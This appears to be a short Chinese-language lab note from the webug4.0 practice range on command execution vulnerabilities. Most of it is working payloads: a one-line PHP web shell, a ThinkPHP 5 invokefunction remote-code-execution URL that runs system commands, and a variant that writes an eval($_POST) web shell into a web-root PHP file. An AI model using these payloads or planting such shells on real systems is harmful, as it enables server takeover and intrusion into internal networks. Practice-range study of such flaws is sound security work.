命令执行
超高危漏洞(满分)
可直接写文件、反弹shell、控制网站或服务器、打进内网
例:
<?php
system($_GET['cmd']);
?>
**靶场:**webug4.0
使页面报错获取具体版本号
具体命令执行payload可以在网上寻找
?s=index/think\app/invokefunction&function=Call_user_func_array&vars[0]=system&vars[1][]=ipconfig
或是使用集成工具
get shell
可以payload写shell或者工具直接写
dir查看路径后写shell?s=index/think\app/invokefunction&function=Call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST[cmd]);?^> >>C:\phpStudy\WWW\control\more\tp5\public\ma.php
有些工具可以直接getshell,但是工具可能会存在问题,误报,无法执行等